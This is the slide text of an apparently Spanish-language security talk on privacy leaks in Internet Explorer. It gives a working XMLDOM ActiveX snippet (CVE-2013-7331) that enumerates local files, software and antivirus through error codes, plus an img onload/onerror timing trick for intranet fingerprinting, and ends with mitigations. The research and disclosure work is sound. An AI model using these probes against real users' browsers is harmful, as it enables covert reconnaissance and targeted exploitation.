Embed Size (px)
Citation preview
Dr. Alfonso Muñoz – Senior Cyber Security Researcher [email protected] @mindcryptRicardo Martín – QA Security Analyst [email protected] @ricardo090489
https://www.elevenpaths.com/es/index.html
AGENDA
Navegadores web en la actualidad
Objetivo: Ataques a la privacidad y fuga de información en IE
- Enumeración local de software y usuarios- Enumeración de red (fingerprinting) NoConName
Enumeración local de software y usuariosEnumeración de red (fingerprinting)DEMOMitigaciones y conclusiones
“Hay tres clases de mentiras: las mentiras, las malditas mentiras y las estadísticas…” - Mark Twain
Navegadores web en la actualidad
Ataques a la privacidad y fuga de información…
- ¿Estoy seguro navegando con mi navegador web?...
- Fuga de información: Robo de cookies, historial de navegación, enlaces pulsados…
http://Ha.ckers.org/weird/CSS-history-hack.html
Enumeración local de servicios y usuarios…
- ¿Qué nos gustaría hacer? ¿Es posible?...
- Enumeración remota de software/hardware instalado- Enumeración de usuarios- Enumeración de productos de seguridad
(versión de antivirus, cortafuegos, EMET, …)- Enumeración de unidades locales- ¿Acceso a información restringida?- ¿Exploits dirigidos?- …
Enumeración local de servicios y usuarios… XMLDOM vulnerabilities
El Document Object Model o
DOM ('Modelo de Objetos del
Documento') es una API que
proporciona un conjunto estándar
de objetos para representar
documentos HTML y XML
permitiendo acceder a ellos para
manipularlos...
Details: Microsoft.XMLDOM ActiveX vulnerabilities W8.1/IE11(CVE-2013-7331 MS14-052 | Sept 2014)
- ¿Qué es ActiveX?
Experts believe the attackers were hoping to infect the computers of active military personnel visiting the site inorder to eventually steal valuable information. The VFW has 1.4 million members, including 75,000 who are stillactive. The sophisticated hackers had booby-trapped the site with a download exploiting XMLDOM and zero-day vulnerabilities within Internet Explorer, Baumgartner said. XMLDOM was used to determine if the Windowssystem was running Microsoft's Enhanced Mitigation Experience Toolkit. If EMET was not present, the attackersdownloaded a backdoor called "ZxShell”…
- Ataques: “U.S. Veterans of Foreign Wars” website, Angler Exploit Kit…
The Microsoft.XMLDOM ActiveX control in Microsoft Windows 8.1 and earlier allows remote attackers todetermine the existence of local pathnames, UNC share pathnames, intranet hostnames, and intranet IPaddresses by examining error codes, as demonstrated by a res:// URL, and exploited in the wild in February2014 (Abril de 2013).
Details: Microsoft.XMLDOM ActiveX vulnerabilities W8.1/IE11(CVE-2013-7331 MS14-052 | Sept 2014)
var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");xmlDoc.async=true;xmlDoc.loadXML('<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "res://'+RUTA+'">');if(xmlDoc.parseError.errorCode!=0){
var err="Error Code: "+xmlDoc.parseError.errorCode+"\n";err+= "Error Code: "+xmlDoc.parseError.reason;err+= "Error Line: "+xmlDoc.parseError.line;//alert(err);
if(err.indexOf("-2147024703")>0){return true;
}else{return false;
}}
Ejemplos RUTA: C:\\Program Files\\Java\\jre7\\bin\\java.exeC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exeD:\\C:\\Program Files (x86)\\Avira\\AntiVir Desktop\\avguard.exe“C:\\Users\\Diego.Ferreiro\\
Code “-2147024703” (existe ruta)
Code “-2147024894” (no existe)“The system cannot find the file specified”
Details: Microsoft.XMLDOM ActiveX vulnerabilities W8.1/IE11(CVE-2013-7331 MS14-052 | Sept 2014)
- ¿Elevación de privilegios?: Acceso a recursos sin los permisos adecuados…
//Users//Administrador//CODIGO: -2147024891 (Acceso denegado)
//Users//Administrado9non//CODIGO: -2747024894 (The system cannot find the file specified)
//Users//Administrador//Desktop//desktop.iniCODIGO: -2147024703 (OK)
//Users//Administrador//Desktop//deskto9.iniCODIGO: -2747024894 (The system cannot find the file specified)
Resumen: Enumeración local de servicios y usuarios…
- Enumeración remota de software instalado- Enumeración de usuarios- Enumeración de productos de seguridad
(versión de antivirus, cortafuegos, EMET, …)- Enumeración de unidades locales- Acceso a información restringida- Exploits dirigidos
Enumeración de red (fingerprinting): Solo es posible mitigar….
- Estudio en profundidad: NoConName 2014
- Jeremiah Grossman (BH 2006): Hacking Intranet Websites from the Outside
¿Qué pasa si buscamos un recurso que no existe?
- Posibilidades: enumeración de red (IP, software, DNS,…) & Exploits dirigidos
Recurso: <img src=“/images/latch.jpg”/>Recurso: <img src=“/apache/apachev1.jpg”/>
…¿Recurso: <img src="http://172.192.19.70" onload="alert(1)" onerror="alert(0)">?
Enumeración de red (fingerprinting): Solo es posible mitigar….
W8.1/IE11
Versión 11.0.9600.17207
Event / TAG=IMG onload/Onerror
Host Activos< 7 seg
(>> 7 seg)
Timeouts
(Host inexistentes) ≈ 7 seg
IE 11.0.9600.17207 (onload/Onerror):
<img>, <object>, <iframe>, <audio>, <video>, <embed>, <frame>, <script>
Configuración por defecto de IE11
<img src="http://172.192.19.70" onload="alert(1)" onerror="alert(0)">
Enumeración de red (fingerprinting): Solo es posible mitigar….Comportamiento de varios SOs
Enumeración de red (fingerprinting): Port Banning….
Internet Explorer: “ancha es castilla…” (<1024)
SÍ (69-tftp,80,115-sftp,135,139,443,445-smb,543-Kerberos,587-smtp, 1433-sqlserver…)NO (21-ftp,110-pop3,993-imaps…)
DEMO: ESCENARIO EXPLOTACIÓN
Mitigaciones y conclusiones
- Actualizar sistema operativo y navegador web (no es suficiente para mitigar 0lday & cia…)
- Fortificar el navegador web
- En determinados escenarios no es posible por usabilidad (“lugares públicos”…)
- Filtros JavaScript (NoScript, …)- Zonas de Internet “seguras” (ActiveX,…)- Port Banning- ¿Inconvenientes?
- Monitoriza y registra la actividad en tu red…
Dr. Alfonso Muñoz – Senior Cyber Security Researcher [email protected] @mindcryptRicardo Martín – Q&A Security Auditor [email protected] @ricardo090489
/* */ || ??
